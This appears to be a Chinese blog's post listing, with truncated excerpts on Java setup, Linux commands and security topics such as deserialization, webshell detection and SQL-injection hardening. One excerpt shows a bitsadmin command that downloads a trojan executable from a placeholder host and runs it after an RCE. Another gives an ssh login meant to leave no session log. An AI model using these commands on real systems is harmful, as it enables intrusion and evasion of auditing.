加载中
clojue镜像

{ :user { :mirrors { "central" { :name "aliyun" :url "https://maven.aliyun.com/nexus/content/groups/public/" } ......

12/01 10:37
5
jdk11 环境变量

export JAVA_HOME=/home/ubuntu/jdk-11.0.1 export PATH=$JAVA_HOME/bin:$PATH /etc/profile 设置好就行了...

JDK
11/29 05:17
21
tomcat 安全记述

<servlet> <servlet-name>jsp</servlet-name> <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class> <init-param> <param-name>fork</param-name> ......

linux下如何批量杀JAVA进程或某个进程方法

pkill -9 java 或者 ps -ef | grep java | grep -v grep | cut -c 9-15 | xargs kill -9 运行这条命令将会杀掉所有含有关键字"java"的进程 下面将这条命令作一下简单说明: 管道符"|"用来隔开...

11/23 09:25
31
反序列化漏洞研究

最近几周一直在研究java的反序列化漏洞相关问题 我们先来看看这个著名的类和其中的那个方法了 对没错 就是这个大名鼎鼎的readObject方法 一旦黑客发现了"可乘之机" 就会构造一个paylaods比如...

09/27 13:17
11
编译jdk8

本文环境 ubuntu 16.04 全新安装虚拟机 apt -y install mercurial # 安装版本控制 add-apt-repository ppa:openjdk-r/ppa apt-get update # 安装jdk7 编译jdk8 需要jdk7 apt -y install ope...

威胁狩猎简介<译文>

什么是威胁狩猎 威胁狩猎也被叫做威胁搜索、网络狩猎或者网络威胁搜索,他不同于apt攻击或者红蓝军渗透测试这类模拟攻击者攻寻找黑入IT设施漏洞的行为。 在威胁狩猎中,安全专家们会打破常规...

09/06 15:57
31
一个牛逼的思路

设立公司黑名单ip库 设立很多伪装性很强的二级域名 有人访问这些二级域名就把ip拉入黑名单库

09/03 16:15
26
远程rce漏洞执行命令

# windows # 首先需要准备一个木马程序ma.exe bitsadmin /transfer myjob1/download /priority normal http://www.xxx.com/ma.exe c:\windows\temp\ma.exe c:\windows\temp\ma.exe # ma.exe保...

09/02 09:07
44
利用lamda函数 的函数式编程 实现scrapy审计外网安全问题

import scrapy from scrapy.spiders import Spider def parse_response(response, ip_in): title = response.xpath("/html/head/title").extract()[0] filename = 'quotes.txt' with open......

08/28 16:15
11
缓解java执行命令抵御反序列化漏洞的实现方案

最近st2 框架又出漏洞了 一大堆java被执行命令了 这里我提一个解决方案 可以适当缓解服务端被漏洞进行rce漏洞的问题 LD_PRELOAD替换进程底层函数 首先请看这篇文章 如果是某位c++的大佬 您老...

不会留下即时日志的ssh登录方法

ssh -T root@127.0.0.1 /bin/bash -i #-T 表示不分配伪终端 (正常的会话,在分配伪终端之后才会调用utmp和wtmp的日志接口) # /usr/bin/bash -i 表示在登录之后 调用bash命令 #不留下.bash...

08/15 14:38
20
改造mybatis抵御sql注入的研究和SDL的思考

这段时间看了百度的openrasp的源代码和相关资料 (地址:https://rasp.baidu.com) 在实施的过程中还是遇到了很多的阻力,所以开始自己调研相关的技术方案 我觉得能在研发阶段就能使程序员适应安...

调试spring boot的方法

首先在springboot的pom.xml中的插件中增加一个用于调试的插件 <build> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-m......

编译mybatis 3.4.6 替换到springboot 2.0.2

编译mybatis需要先编译一个mybatis的parent项目(对应的spring boot 2.0.2的mybatis-spring-boot-starter的mybatis版本) 本文举例为mybatis 3.4.6(本文当前的springboot 依赖3.4.6 可以在ide...

php查inode时间戳查webshell

<?php function read_all($dir) { if (!is_dir($dir)) return false; $handle = opendir($dir); if ($handle) { while (($fl = readdir($handle)) !== false) { $temp = $......

07/07 15:53
29
利用openssl生成强密码命令

echo `openssl rand -base64 50 | tr -dc A-Z-a-z-0-9 | head -c${1:-32}` # 只会出现大小写和数字 长度控制在32位 # 第一个50代表足够的原始长度 第二个32代表长度为32......

06/22 11:16
19
nmap为了开发方便 可以做简单的修改

因为nmap扫描是默认使用的是nse脚本,但是在开发的过程中需要修改后缀(主要是因为后缀为lua才能显示高亮,所以这里用一个取巧的办法) nse_main.lua文件中我们找到如下代码 local t, path = cn...

06/19 13:52
10
python3写unicode编码到文件

import sys #读取源文件内容支持中文 用的utf-8 f=open('be.txt','r',encoding='utf-8') data=f.read() f.close() # 打印宽字节编码 print(data.encode('unicode_escape')) # 写入...

06/13 17:42
40
centos6/7通用查看系统版本

cat /etc/redhat-release # 或者 cat /etc/centos-release 不管是 6 还是 7 都能看到 发行的版本信息

06/11 10:37
14

没有更多内容

加载失败,请刷新页面

返回顶部
顶部